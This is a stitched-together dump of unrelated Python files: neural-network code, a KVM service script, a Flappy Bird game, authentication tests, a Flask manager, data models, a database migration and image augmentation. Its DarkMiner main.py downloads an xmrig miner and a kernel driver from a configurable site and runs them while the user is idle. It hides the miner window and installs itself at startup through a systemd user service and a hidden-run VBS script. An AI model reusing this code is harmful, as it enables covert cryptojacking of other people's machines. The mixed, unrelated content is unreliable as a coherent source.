self.convnet_shape[0,:] = [self.nConvFilters, 1, self.convFilterSize, self.convFilterSize]
#self.convnet_shape[0,:] = [1, self.nConvFilters, self.convFilterSize, self.convFilterSize]
for i in range(1, self.nConvLayers):
self.convnet_shape[i,:] = [self.nConvFilters, self.nConvFilters, self.convFilterSize, self.convFilterSize]
## Define regression network component
if self.regLayers is not None:
self.regnet_shape = np.ndarray([len(self.regLayers), 2])
self.regnet_shape[0, :] = \
[self.nConvFilters*self.postConvImageShape[0]*self.postConvImageShape[1], self.regLayers[0]]
for i in range(1, len(self.regLayers)):
self.regnet_shape[i,:] = [self.regLayers[i-1], self.regLayers[i]]
else:
self.regnet_shape = None
""" Randomly Initialize Network Weights """
def __init_weights(self):
self.cw = () #Convolution weights
self.cb = () #Convolution biases
for layer in range(0, self.nConvLayers):
#Initialize within optimum range for tanh activation]
#Initialize convoluional layer weights
fan_in = self.convnet_shape[layer, 1] * (self.sample_size**3)
fan_out = self.convnet_shape[layer, 0] * (self.convFilterSize**3)
bound = np.sqrt(6.0/(fan_in+fan_out))
self.cw += (theano.shared(np.asarray(self.rng.uniform(low= -bound,
high= bound,
size = self.convnet_shape[layer, :]),
dtype=theano.config.floatX), name='cw-'+str(layer)) ,)
self.cb += (theano.shared(np.asarray(np.ones(self.convnet_shape[layer, 0]),
dtype=theano.config.floatX), name='cb-'+str(layer)) ,)
self.rw = () #Regression weights
self.rb = () #Regression biases
for layer in range(0, len(self.regLayers)):
#Initialize regression layer weights
bound = 0.75
self.rw += (theano.shared(np.asarray(self.rng.uniform(low= -bound,
high= bound,
size = self.regnet_shape[layer, :]),
dtype=theano.config.floatX), name='rw-'+str(layer)) ,)
self.rb += (theano.shared(np.asarray(np.ones(self.regnet_shape[layer, 1]),
dtype=theano.config.floatX), name='rb-'+str(layer)) ,)
""" Load network meta-data from folder """
def __save_config(self, folder):
try:
if not folder.endswith("/"):
folder += "/"
file = folder+self.configData
config = configparser.ConfigParser()
if os.path.isfile(file):
config.read(file)
if not config.has_section('General'):
config.add_section('General')
config.set('General', 'device', str(self.device))
if not config.has_section('Network'):
config.add_section('Network')
config.set('Network', 'network_folder', folder)
config.set('Network', 'name', str(self.name))
config.set('Network', 'image_width', str(self.imageShape[0]))
config.set('Network', 'image_height', str(self.imageShape[1]))
config.set('Network', 'convolution_layers', str(self.nConvLayers))
config.set('Network', 'convolution_filters', str(self.nConvFilters))
config.set('Network', 'filter_size', str(self.convFilterSize))
config.set('Network', 'regression_layers', str(self.nRegLayers))
config.set('Network', 'layer_size', str(self.regLayerSize))
config.set('Network', 'number_classes', str(self.nClasses))
config.set('Network', 'activation', str(self.activation))
with open(file, 'w') as f:
config.write(f)
return True
except Exception as e:
print("Unable to save network configuration data: ",e)
return False
""" Load network meta-data from folder """
def __load_config(self, folder):
if not folder.endswith("/"):
folder += "/"
file = folder+self.configData
if os.path.isfile(file):
config = configparser.ConfigParser(file)
self.name=config.get('Network', 'name')
self.imageShape=( config.getint('Network', 'image_width'), config.getint('Network', 'image_height') )
self.nConvLayers=config.getint('Network', 'convolutional_layers')
self.nConvFilters=config.getint('Network', 'convolutional_filters')
self.convFilterSize=config.getint('Network', 'filter_size')
self.nRegLayers=config.getint('Network', 'regression_layers')
self.regLayerSize=config.getint('Network', 'layer_size')
self.nClasses=config.getint('Network', 'number_classes')
self.regLayers = ()
for i in range(self.nRegLayers):
self.regLayers += (self.regLayerSize ,)
self.regLayers += (self.nClasses ,)
self.activation=config.get('Network', 'activation')
self.sample_size = self.nConvLayers*(self.convFilterSize -1) +1
return True
else:
print("Unable to load network configuration data.")
return False
""" Load weights from folder """
def __load_weights(self, folder):
if not folder.endswith("/"):
folder += "/"
if not os.path.exists(folder+"weights"):
return False
try:
self.cw = () #Convolution weights
self.cb = () #Convolution biases
for layer in range(0, self.nConvLayers):
self.cw += (theano.shared(
np.genfromtxt(folder+"weights/conv/layer_"+str(layer)+"_weights.csv",
delimiter=',')) ,)
self.cb += (theano.shared(
np.genfromtxt(folder+"weights/conv/layer_"+str(layer)+"_bias.csv",
delimiter=',')) ,)
self.rw = () #Regression weights
self.rb = () #Regression biases
for layer in range(0, len(self.regLayers)):
self.rw += (theano.shared(
np.genfromtxt(folder+"weights/reg/layer_"+str(layer)+"_weights.csv",
delimiter=',')) ,)
self.rb += (theano.shared(
np.genfromtxt(folder+"weights/reg/layer_"+str(layer)+"_bias.csv",
delimiter=',')) ,)
except:
return False
""" Create Symbolic Theano definition for network """
def __create_model(self):
#Prepare input tensor
Xin = self.X.dimshuffle(0, 'x', 1, 2)
#Set up convolutional layers
out = T.tanh(conv2d(Xin, self.cw[0], border_mode='valid') + self.cb[0].dimshuffle('x',0,'x','x'))
for layer in range(1, self.nConvLayers):
out = T.tanh(conv2d(out, self.cw[layer], border_mode='valid') + self.cb[layer].dimshuffle('x',0,'x','x'))
#Set up regression layers
out = T.tanh(T.dot(out.flatten(2), self.rw[0]) + self.rb[0])
for layer in range(1, len(self.regLayers)-1):
out = T.tanh(T.dot(out, self.rw[layer]) + self.rb[layer])
#Set up output layer
out = T.nnet.sigmoid(T.dot(out, self.rw[-1]) + self.rb[-1])
self.out = out
| 2.5
| 2
|
python/main.py
|
Luke-Larsen/DarkMiner
| 3
|
12783918
|
# Version 1
#TODO clean up these imports now that we are doing more modular processing
import sys, signal,platform,os,time,subprocess,configparser,multiprocessing,easygui,requests
from Communicate import *
from functions import LinuxIdleTime,WindowsIdleTime
#Script Version
ScriptVersion = '1.0'
#SHA256 of your downtime programs
SHA256ProgramMiner = '7db002483369077051d179a80105a816c45951c24fe65023d58bc05609c49f65'
SHA256ProgramSheepit = 'e4674e9e1be5bfd843c10dd9e4c42767608e3777760c83f9ccdfad5d9cffe59c'
#Github Repo link
GithubLink = 'https://api.github.com/repos/Luke-Larsen/DarkMiner'
#Development Mode ( Stops it from hiding in the background)
DevMode = 0 #0 off. Anything else means on
#functions
def errorOccurred(errorCode):
easygui.msgbox(errorCode,"ERROR OCCURRED")
sys.exit("ERROR")
def UpdateTotalMiningTime(value):
config.read('config.ini')
TotalTimeMining = config['value']['TotalTimeMining']
NewTotalTimeMining = int(TotalTimeMining) + int(value)
config['value'] = {
'TotalTimeMining' : NewTotalTimeMining
}
with open(os.path.expanduser('~') +'/.darkminer/config.ini', 'w+') as configfile:
config.write(configfile)
def UpdateScript():
print("Ran Update")
def Is64Windows():
return 'PROGRAMFILES(X86)' in os.environ
def GetProgramFiles32():
if Is64Windows():
return False
else:
return True
from functions import DownloadData
def Miner():
#TODO: Check if the last idle time is less then 1 minute and if it is increase the idle time required in the config.
#TODO: Start logging away time so that we can build a simple computer model of downtime to prevent false positives
if Communication == 2:
downTimeSignal(BaseSite,1)
if osSystem == 'win32':
if not os32Bit:
if os.path.exists(WinPathDownloads + 'xmrig.exe'):
print('exists no need to download')
else:
DownloadData(BaseSite + 'xmrig.exe', WinPathDownloads + 'xmrig.exe')
if os.path.exists(WinPathDownloads + 'WinRing0x64.sys'):
print('exists no need to download')
else:
DownloadData(BaseSite + 'WinRing64.sys', WinPathDownloads + 'WinRing0x64.sys')
if os.path.exists(WinPathDownloads + 'config.json'):
print('exists no need to download')
else:
DownloadData(BaseSite + 'config.json', WinPathDownloads + 'config.json')
import win32gui
import win32api
proc = subprocess.Popen([WinPathDownloads + "xmrig.exe"])
time.sleep(3)
def enumWindowFunc(hwnd, windowList):
""" win32gui.EnumWindows() callback """
text = win32gui.GetWindowText(hwnd)
className = win32gui.GetClassName(hwnd)
if text.find("xmrig") >= 0:
windowList.append((hwnd, text, className))
myWindows = []
win32gui.EnumWindows(enumWindowFunc, myWindows)
for hwnd, text, className in myWindows:
win32gui.ShowWindow(hwnd, False)
print('Running Miner waiting for action from user')
TotalSleepTime = 0
LastActivity = win32api.GetLastInputInfo()
while True:
if LastActivity != win32api.GetLastInputInfo():
proc.terminate() # Terminates Child Process
UpdateTotalMiningTime(TotalSleepTime)
if Communication == 2:
downTimeSignal(BaseSite,0)
break
elif LastActivity == win32api.GetLastInputInfo():
time.sleep(3)
TotalSleepTime += 3
main()
elif osSystem == 'Linux':
if is_64bits:
if(DownTimeActivity == "Miner"):
from Miner import LinuxMine64
LinuxMine64(LinuxPathDownloads,SHA256ProgramMiner,SHA256Program,waitTime,Communication,BaseSite)
elif(DownTimeActivity == "Sheepit"):
from sheepit import LinuxRender64
LinuxRender64(LinuxPathDownloads,waitTime,Communication,BaseSite)
main()
def Install():
if easygui.ynbox('Proceed with the install of DarkMiner. If you do not know what this is press NO', 'Title', ('Yes', 'No')):
if easygui.ynbox('Would you like this to reboot on each startup of the computer', 'Title', ('Yes', 'No')):
rebootStart = 1
else:
rebootStart = 0
#Grab data for config
msg = "Enter your configuration values"
title = "Enter Config data"
#0 least communication. 2 is the most communication
fieldNames = ["Webdomain", "Communication mode(0-2)"]
fieldValues = easygui.multenterbox(msg, title, fieldNames)
if fieldValues is None:
sys.exit(0)
# make sure that none of the fields were left blank
while 1:
errmsg = ""
for i, name in enumerate(fieldNames):
if fieldValues[i].strip() == "":
errmsg += "{} is a required field.\n\n".format(name)
if errmsg == "":
break # no problems found
fieldValues = easygui.multenterbox(errmsg, title, fieldNames, fieldValues)
if fieldValues is None:
break
#TODO check to make sure the website url is valid and will work
#writting to config
config['settings'] = {
"Agree" : 1,
"Communication" : fieldValues[1], #0 no communication; 1 basic comunication; 2 verbose communication
"DownTimeActivity" : "Miner",
"rebootStart" : rebootStart,
"waitTime" : '120',
"WinPathDownloads" : 'C:/Users/' + os.getlogin() + '/Downloads/',
"LinuxPathDownloads" : os.path.expanduser('~') +'/.darkminer/',
"UpdateFrom": 0 #0 github, 1 CNC
}
config['server'] = {
"Version" : ScriptVersion,
'BaseSite' : fieldValues[0]
}
config['value'] = {
'TotalTimeMining' : 0,
'SHA256Program': SHA256ProgramMiner #Checking the sha256 of the downloaded program to make sure that its good for now you will need to change it manually
}
with open('config.ini', 'w') as configfile:
config.write(configfile)
TotalTimeMining = 0
if(rebootStart):
#Set path to bin and create a folder in it
UserPath = os.path.expanduser('~') +'/.darkminer/'
FileName = sys.argv[0]
if not os.path.isdir(UserPath):
if osSystem == 'win32':
os.makedirs(UserPath)
elif osSystem == 'Linux':
os.mkdir(UserPath,0o755)
#code for setting up the boot
if osSystem == 'Linux':
#switching to using systemd
#check if systemd user path is set up
if not os.path.isdir(os.path.expanduser('~')+'/.config/systemd/user'):
os.mkdir(os.path.expanduser('~')+'/.config/systemd',0o755)
os.mkdir(os.path.expanduser('~')+'/.config/systemd/user',0o755)
#Add our service
filehandle = open(os.path.expanduser('~')+'/.config/systemd/user/darkminer.service', 'w')
if DevMode == 0:
filehandle.write('[Unit]\
\nDescription=Dark Miner Service\
\nPartOf=graphical-session.target\
\n[Service]\
\nExecStart=/usr/bin/python3.8 '+os.path.expanduser('~')+'/.darkminer/main.py --display=:0.0\
\nRestart=always\
\n[Install]\
\nWantedBy=xsession.target\
')
else:
filehandle.write('[Unit]\
\nDescription=Dark Miner Service\
\nPartOf=graphical-session.target\
\n[Service]\
\nExecStart=/usr/bin/python3.8 '+os.path.expanduser('~')+'/.darkminer/main.py\
\nRestart=always\
\n[Install]\
\nWantedBy=xsession.target\
')
filehandle.close()
#Setting up startup on user login; check graphical environment is ready
filehandle = open(os.path.expanduser('~')+'/.config/systemd/user/xsession.target', 'w')
filehandle.write('[Unit]\
\nDescription=Users Xsession running\
\nBindsTo=graphical-session.target\
')
filehandle.close()
#Start xsession.service on user login
filehandle = open(os.path.expanduser('~')+'/.xsessionrc', 'w')
filehandle.write('systemctl --user import-environment PATH DBUS_SESSION_BUS_ADDRESS\
\nsystemctl --no-block --user start xsession.target\
')
filehandle.close()
result = subprocess.run(['systemctl', '--user', 'enable','darkminer'], stdout=subprocess.PIPE)
print(result)
elif osSystem == 'win32':
#I may come back to this later so that I can use the task schedular for updating and running some on crash. Also might make it
#easier to install because windows probably picks up this method as a virus.
#Keep everything clean and in folders
os.makedirs(os.path.expanduser('~')+"/AppData/Roaming/DarkMiner/")
bat = open(os.path.expanduser('~')+"/AppData/Roaming/DarkMiner/"+"DarkMiner.bat", "a")
bat.write("py "+UserPath+"main.py")
bat.close()
#now create a vbs script so you don't have to see the damn terminal all the time
vbs = open(os.path.expanduser('~')+"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/"+"DarkMiner.vbs", "a")
vbs.write('Set WinScriptHost = CreateObject("WScript.Shell") \n WinScriptHost.Run Chr(34) & "'+os.path.expanduser('~')+"/AppData/Roaming/DarkMiner/DarkMiner.bat"+'" & Chr(34), 0 \n Set WinScriptHost = Nothing')
vbs.close()
#Copy files to working directory
from shutil import copyfile
copyfile("main.py", UserPath+"main.py")
copyfile("functions.py", UserPath+"functions.py")
copyfile("Communicate.py", UserPath+"Communicate.py")
copyfile("Miner.py", UserPath+"Miner.py")
copyfile("sheepit.py", UserPath+"sheepit.py")
copyfile("config.ini", UserPath+"config.ini")
#os.remove("config.ini")
#Start file from working directory
easygui.msgbox('Installed DarkMiner in '+UserPath+ " starting program", 'All done')
if osSystem == 'Linux':
if DevMode == 0:
os.system("nohup python3 "+UserPath+"main.py"+" &")
else:
os.system("python3 "+UserPath+"main.py")
elif osSystem == 'win32':
os.system("py "+UserPath+"main.py")
def main():
if osSystem == 'win32':
WindowsIdleTime()
elif osSystem == 'Linux':
LinuxIdleTime(waitTime)
Miner()
#Handle a program shutdown
def handler(signum = None, frame = None):
print('\n')
if DownTimeActivity == "Miner":
from Miner import Kill
elif DownTimeActivity == "Sheepit":
from sheepit import Kill
Kill()
print('Program Closed')
sys.exit(0)
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP, signal.SIGQUIT]:
signal.signal(sig, handler)
#Dependency check
try:
result = subprocess.run(['xprintidle'], stdout=subprocess.PIPE)
except:
print("xprintidle is not installed")
exit()
#Read from Config file if exists
config = configparser.ConfigParser()
if os.path.isfile(os.path.expanduser('~') +'/.darkminer/'+"config.ini"):
config.read(os.path.expanduser('~') +'/.darkminer/'+"config.ini")
#Settings
Agree = int(config['settings']['Agree'])
Communication = int(config['settings']['communication'])
DownTimeActivity = config['settings']['DownTimeActivity'] #What you want to run on downtime
rebootStart = int(config['settings']['rebootStart'])
waitTime = int(config['settings']['waitTime'])
WinPathDownloads = config['settings']['WinPathDownloads']
LinuxPathDownloads = config['settings']['LinuxPathDownloads']
try:
UpdateFrom = config['settings']['UpdateFrom']
except KeyError as e:
#No value set because this could be an update to a running system
UpdateFrom = 0
#Server
BaseSite = config['server']['BaseSite']
Version = config['server']['Version']
#check if updated script
if float(Version) < float(ScriptVersion):
print('Script has been updated')
Version = ScriptVersion
config['server']= {
'BaseSite': BaseSite,
'Version' : ScriptVersion
}
with open('config.ini', 'w') as configfile:
config.write(configfile)
#Values
TotalTimeMining = config['value']['totaltimemining']
try:
SHA256Program = config['value']['SHA256Program']
except KeyError as e:
SHA256Program = SHA256ProgramMiner
else:
Agree = 0
#Start of program determines what operating system to go with
if sys.platform.startswith('win32'):
osSystem = 'win32'
os32Bit = GetProgramFiles32()
#Check if User has agreed to mine
if(Agree):
#Check version of the program to make sure we are running the latest and greatest
if Communication >= 1:
checkVersion(ScriptVersion,BaseSite,osSystem,GithubLink)
main()
else:
Install()
elif sys.platform.startswith('linux'):
osSystem = 'Linux'
is_64bits = sys.maxsize > 2 ** 32
if(Agree):
if Communication >= 1:
checkVersion(ScriptVersion,BaseSite,osSystem,GithubLink)
main()
else:
Install()
| 2.125
| 2
|
templates/app/kvm/actions.py
|
Jumpscale/ays_jumpscale8
| 0
|
12783919
|
def install(job):
cuisine = job.service.executor.cuisine
# install kvm
cuisine.systemservices.kvm.install()
# start libvirt-bin
job.service.executeActionJob('start', inprocess=True)
job.service.model.actions['uninstall'].state = 'new'
job.service.saveAll()
def start(job):
cuisine = job.service.executor.cuisine
services_to_start = ['libvirt-bin', 'virtlogd']
for service in services_to_start:
if not cuisine.processmanager.exists(service):
raise j.exceptions.RuntimeError("{} service doesn't exists. \
it should have been created during installation of this service".format(service))
cuisine.processmanager.start(service)
job.service.model.actions['stop'].state = 'new'
job.service.saveAll()
def stop(job):
cuisine = job.service.executor.cuisine
services_to_start = ['libvirt-bin', 'virtlogd']
for service in services_to_start:
if not cuisine.processmanager.exists(service):
raise j.exceptions.RuntimeError("{} service doesn't exists. \
it should have been created during installation of this service".format(service))
cuisine.processmanager.stop(service)
job.service.model.actions['start'].state = 'new'
job.service.saveAll()
def uninstall(job):
cuisine = job.service.executor.cuisine
cuisine.systemservices.kvm.uninstall()
job.service.model.actions['install'].state = 'new'
job.service.saveAll()
| 2.09375
| 2
|
flappybird.py
|
hxg10636/flappygame
| 0
|
12783920
|
import pygame
import sys
#define bird class
class Bird(object):
def __init__(self):
self.birdRect = pygame.Rect(65,50,50,50)
self.birdStatus = [pygame.image.load("flappybirdassets/assets/1.png"),
pygame.image.load("flappybirdassets/assets/2.png"),
pygame.image.load("flappybirdassets/assets/dead.png")]
self.status = 0
self.birdX = 120
self.birdY = 350
self.jump = False
self.jumpSpeed = 10
self.gravity = 5
self.dead = False
def birdUpdate(self):
#movement
if self.jump:
self.jumpSpeed -= 1
self.birdY -= self.jumpSpeed
else:
self.gravity += 0.2
self.birdY += self.gravity
self.birdRect[1] = self.birdY
def createMap():
screen.blit(background,(0,0))
#display pine
screen.blit(Pipeline.pineUp,(Pipeline.wallx, -300))
screen.blit(Pipeline.pineUp,(Pipeline.wallx, 500))
Pipeline.PipelineUpdate()
#display bird
if Bird.dead :
Bird.status = 2
elif Bird.jump :
Bird.status = 1
screen.blit(Bird.birdStatus[Bird.status], (Bird.birdX,Bird.birdY))
Bird.birdUpdate()
screen.blit(font.render('Score:'+ str(score),1,(255,255,255)),(100,50))
pygame.display.update()
#define pipeline class
class Pipeline(object):
def __init__(self):
self.wallx = 400
self.pineUp = pygame.image.load("flappybirdassets/assets/top.png")
self.pineDown = pygame.image.load("flappybirdassets/assets/bottom.png")
def PipelineUpdate(self):
#movement
self.wallx -= 5
if self.wallx < -80:
global score
score += 1
self.wallx = 400
def checkDead():
upRect = pygame.Rect(Pipeline.wallx,-300,Pipeline.pineUp.get_width(),Pipeline.pineUp.get_height())
downRect = pygame.Rect(Pipeline.wallx,500,Pipeline.pineDown.get_width(),Pipeline.pineDown.get_height())
if upRect.colliderect(Bird.birdRect) or downRect.colliderect(Bird.birdRect):
Bird.dead = True
if not Bird.birdRect[1] < height:
Bird.dead = True
return True
else:
return False
def getResult():
final_text1 = "GAME OVER"
final_text2 = "Your final score is :" + str(score)
ft1_font = fit1_font = pygame.font.SysFont("Arial",70)
ft1_surf = font.render(final_text1,1,(242,3,36))
ft2_font = fit2_font = pygame.font.SysFont("Arial",50)
ft2_surf = font.render(final_text2,1,(253,177,6))
screen.blit(ft1_surf,[screen.get_width()/2-ft1_surf.get_width()/2,100])
screen.blit(ft2_surf,[screen.get_width()/2-ft2_surf.get_width()/2,200])
pygame.display.update()
if __name__ == '__main__':
pygame.init()
font = pygame.font.SysFont(None,50)
size = width, height = 400,650
screen = pygame.display.set_mode(size) #setting windows sieze
clock = pygame.time.Clock()# setting delay time
color = (255,255,255)
Bird = Bird()
Pipeline = Pipeline()
score = 0
while True:
clock.tick(60)
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
if (event.type == pygame.MOUSEBUTTONDOWN or event.type == pygame.KEYDOWN) and not Bird.dead :
Bird.jump = True
Bird.gravity = 5
Bird.jumpSpeed = 10
# screen.fill(color)
background = pygame.image.load("flappybirdassets/assets/background.png")
if checkDead():
getResult()
else:
createMap()
pygame.quit()
| 3.265625
| 3
|
spec/rackspace.py
|
jmvrbanac/requests-cloud-auth
| 1
|
12783921
|
from mock import patch
from specter import Spec, expect
from requests_cloud_auth import rackspace
from spec import get_keystone_v2_auth_resp
class AuthenticationToRackspace(Spec):
class PasswordAuthentication(Spec):
def before_all(self):
self.auth = rackspace.RackspacePasswordAuth(
username='tester',
password='password'
)
@patch("requests.post")
def can_authenticate(self, post_func):
post_func.return_value = get_keystone_v2_auth_resp()
creds = self.auth.authenticate()
expect(creds.get('token', None)).to.equal('some_token')
expect(creds.get('project_id', None)).to.equal('some_tenant')
@patch("requests.post")
def can_get_token(self, post_func):
post_func.return_value = get_keystone_v2_auth_resp()
token, tenant = self.auth.get_token()
expect(token).to.equal('some_token')
class ApiKeyAuthentication(Spec):
def before_all(self):
self.auth = rackspace.RackspaceApiKeyAuth(
username='tester',
api_key='api_key'
)
@patch("requests.post")
def can_authenticate(self, post_func):
post_func.return_value = get_keystone_v2_auth_resp()
creds = self.auth.authenticate()
expect(creds.get('token', None)).to.equal('some_token')
expect(creds.get('project_id', None)).to.equal('some_tenant')
@patch("requests.post")
def can_get_token(self, post_func):
post_func.return_value = get_keystone_v2_auth_resp()
token, tenant = self.auth.get_token()
expect(token).to.equal('some_token')
class SupportedRackspaceRegions(Spec):
def can_use_uk_region(self):
self.auth = rackspace.RackspacePasswordAuth(
username='tester',
password='<PASSWORD>',
region='UK'
)
expect(rackspace.UK_ENDPOINT).to.be_in(self.auth.endpoint)
self.auth = rackspace.RackspaceApiKeyAuth(
username='tester',
api_key='some_pass',
region='UK'
)
expect(rackspace.UK_ENDPOINT).to.be_in(self.auth.endpoint)
def can_use_us_region(self):
self.auth = rackspace.RackspacePasswordAuth(
username='tester',
password='<PASSWORD>',
region='US'
)
expect(rackspace.US_ENDPOINT).to.be_in(self.auth.endpoint)
self.auth = rackspace.RackspaceApiKeyAuth(
username='tester',
api_key='some_pass',
region='US'
)
expect(rackspace.US_ENDPOINT).to.be_in(self.auth.endpoint)
| 2.296875
| 2
|
manage.py
|
kongminhao/flask-blueprint-with-docker
| 0
|
12783922
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 17/3/21 下午5:32
import os
from app import create_app, db
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
manager = Manager(app)
migrate = Migrate(app, db)
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
| 1.90625
| 2
|
src/domaindiscovery/models/response.py
|
whois-api-llc/domain-discovery-py
| 0
|
12783923
|
import copy
import datetime
import re
from .base import BaseModel
import sys
if sys.version_info < (3, 9):
import typing
_re_date_format = re.compile(r'^\d\d\d\d-\d\d-\d\d$')
_re_datetime_format = re.compile(
r'^(\d\d\d\d-\d\d-\d\dT\d\d:\d\d:\d\d)\+(\d\d):(\d\d)$')
def _datetime_value(values: dict, key: str) -> datetime.datetime or None:
if key in values and values[key] is not None:
value = values[key]
match = _re_datetime_format.fullmatch(value)
if match is not None:
(dt, tz_hours, tz_minutes) = match.groups()
value = "{}+{}{}".format(dt, tz_hours, tz_minutes)
return datetime.datetime.strptime(
value, '%Y-%m-%dT%H:%M:%S%z')
return None
def _date_value(values: dict, key: str) -> datetime.date or None:
if key in values and values[key] is not None:
if _re_date_format.match(values[key]) is not None:
return datetime.datetime.strptime(
values[key], '%Y-%m-%d').date()
return None
def _string_value(values: dict, key: str) -> str:
if key in values and values[key]:
return str(values[key])
return ''
def _int_value(values: dict, key: str) -> int:
if key in values and values[key]:
return int(values[key])
return 0
def _list_value(values: dict, key: str) -> list:
if key in values and type(values[key]) is list:
return copy.deepcopy(values[key])
return []
def _timestamp2datetime(timestamp: int) -> datetime.datetime or None:
if timestamp is not None:
return datetime.datetime.fromtimestamp(timestamp)
return None
class Response(BaseModel):
domains_count: int
if sys.version_info < (3, 9):
domains_list: typing.List[str]
else:
domains_list: [str]
def __init__(self, values):
super().__init__()
self.domains_count = 0
self.domains_list = []
if values is not None:
self.domains_count = _int_value(values, 'domainsCount')
self.domains_list = _list_value(values, 'domainsList')
class ErrorMessage(BaseModel):
code: int
message: str
def __init__(self, values):
super().__init__()
self.int = 0
self.message = ''
if values is not None:
self.code = _int_value(values, 'code')
self.message = _string_value(values, 'messages')
| 2.53125
| 3
|
instance/versions/2425b6924b1c_13migration.py
|
kalister5/pitch
| 0
|
12783924
|
"""13Migration
Revision ID: 2425b<PASSWORD>c
Revises: <PASSWORD>
Create Date: 2018-09-08 18:25:12.151586
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '2<PASSWORD>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('pitches', sa.Column('title', sa.String(length=255), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('pitches', 'title')
# ### end Alembic commands ###
| 1.507813
| 2
|
lib/datasets/augmentation.py
|
ParikhKadam/HybridPose
| 369
|
12783925
|
import numpy as np
import cv2
import pdb
# https://github.com/zju3dv/clean-pvnet/blob/master/lib/datasets/augmentation.py
def debug_visualize(image, mask, pts2d, sym_cor, name_prefix='debug'):
from random import sample
cv2.imwrite('{}_image.png'.format(name_prefix), image * 255)
cv2.imwrite('{}_mask.png'.format(name_prefix), mask * 255)
img_pts = image.copy() * 255
for i in range(pts2d.shape[0]):
x = int(round(pts2d[i, 0]))
y = int(round(pts2d[i, 1]))
img_pts = cv2.circle(img_pts, (x, y), 2, (0, 0, 255), thickness=-1)
cv2.imwrite('{}_pts.png'.format(name_prefix), img_pts)
img_sym = image.copy() * 255
ys, xs = np.nonzero(mask)
for i_pt in sample([i for i in range(len(ys))], min(100, len(ys))):
y = int(round(ys[i_pt]))
x = int(round(xs[i_pt]))
x_cor, y_cor = sym_cor[y, x]
x_cor = int(round(x + x_cor))
y_cor = int(round(y + y_cor))
img_sym = cv2.line(img_sym, (x, y), (x_cor, y_cor), (0, 0, 255), 1)
cv2.imwrite('{}_sym.png'.format(name_prefix), img_sym)
def rotate_sym_cor(sym_cor, mask, R):
h, w = sym_cor.shape[:2]
ys, xs = np.nonzero(mask)
source = np.float32(np.stack([xs, ys], axis=-1))
delta = np.float32(sym_cor[ys, xs])
target = source + delta
last_col = np.ones((source.shape[0], 1), dtype=np.float32)
source = np.concatenate([source, last_col], axis=-1)
target = np.concatenate([target, last_col], axis=-1)
last_row = np.asarray([[0, 0, 1]], dtype=np.float32)
R = np.concatenate([R, last_row], axis=0).transpose()
source = np.matmul(source, R)[:, :2]
target = np.matmul(target, R)[:, :2]
source = np.uint32(np.round(source))
delta = target - source
# remove invalid indices
xs, ys = source[:, 0], source[:, 1]
valid = (xs > 0) & (xs < w) & (ys > 0) & (ys < h)
xs, ys, delta = xs[valid], ys[valid], delta[valid]
sym_cor = np.zeros_like(sym_cor)
sym_cor[ys, xs] = delta
return sym_cor
def rotate_instance(img, mask, hcoords, sym_cor, rot_ang_min, rot_ang_max):
h, w = img.shape[0], img.shape[1]
degree = np.random.uniform(rot_ang_min, rot_ang_max)
hs, ws = np.nonzero(mask)
R = cv2.getRotationMatrix2D((np.mean(ws), np.mean(hs)), degree, 1)
sym_cor = rotate_sym_cor(sym_cor, mask, R)
mask = cv2.warpAffine(mask, R, (w, h), flags=cv2.INTER_NEAREST, borderMode=cv2.BORDER_CONSTANT, borderValue=0)
img = cv2.warpAffine(img, R, (w, h), flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT, borderValue=0)
last_row = np.asarray([[0, 0, 1]], dtype=np.float32)
R = np.concatenate([R, last_row], axis=0).transpose()
last_col = np.ones((hcoords.shape[0], 1), dtype=np.float32)
hcoords = np.concatenate([hcoords, last_col], axis=1)
hcoords = np.float32(np.matmul(hcoords, R))
hcoords = hcoords[:, :2]
return img, mask, hcoords, sym_cor
def crop_resize_instance_v1(img, mask, hcoords, sym_cor, imheight, imwidth,
overlap_ratio=0.5, ratio_min=0.8, ratio_max=1.2):
'''
crop a region with [imheight*resize_ratio,imwidth*resize_ratio]
which at least overlap with foreground bbox with overlap
'''
hcoords_last_col = np.ones((hcoords.shape[0], 1), dtype=np.float32)
hcoords = np.concatenate([hcoords, hcoords_last_col], axis=1)
resize_ratio = np.random.uniform(ratio_min, ratio_max)
target_height = int(imheight * resize_ratio)
target_width = int(imwidth * resize_ratio)
img, mask, hcoords, sym_cor = crop_or_padding_to_fixed_size_instance(
img, mask, hcoords, sym_cor, target_height, target_width, overlap_ratio)
img = cv2.resize(img, (imwidth, imheight), interpolation=cv2.INTER_LINEAR)
mask = cv2.resize(mask, (imwidth, imheight), interpolation=cv2.INTER_NEAREST)
sym_cor = cv2.resize(sym_cor, (imwidth, imheight), interpolation=cv2.INTER_NEAREST)
sym_cor /= resize_ratio
hcoords[:, 0] = hcoords[:, 0] / resize_ratio
hcoords[:, 1] = hcoords[:, 1] / resize_ratio
hcoords = hcoords[:, :2]
return img, mask, hcoords, sym_cor
def crop_or_padding_to_fixed_size_instance(img, mask, hcoords, sym_cor, th, tw,
overlap_ratio=0.5):
h, w, _ = img.shape
hs, ws = np.nonzero(mask)
hmin, hmax = np.min(hs), np.max(hs)
wmin, wmax = np.min(ws), np.max(ws)
fh, fw = hmax - hmin, wmax - wmin
hpad, wpad = th >= h, tw >= w
hrmax = int(min(hmin + overlap_ratio * fh, h - th)) # h must > target_height else hrmax<0
hrmin = int(max(hmin + overlap_ratio * fh - th, 0))
wrmax = int(min(wmin + overlap_ratio * fw, w - tw)) # w must > target_width else wrmax<0
wrmin = int(max(wmin + overlap_ratio * fw - tw, 0))
hbeg = 0 if (hpad or hrmin == hrmax) else np.random.randint(hrmin, hrmax)
hend = hbeg + th
wbeg = 0 if (wpad or wrmin == wrmax) else np.random.randint(wrmin, wrmax) # if pad then [0,wend] will larger than [0,w], indexing it is safe
wend = wbeg + tw
img = img[hbeg:hend, wbeg:wend]
mask = mask[hbeg:hend, wbeg:wend]
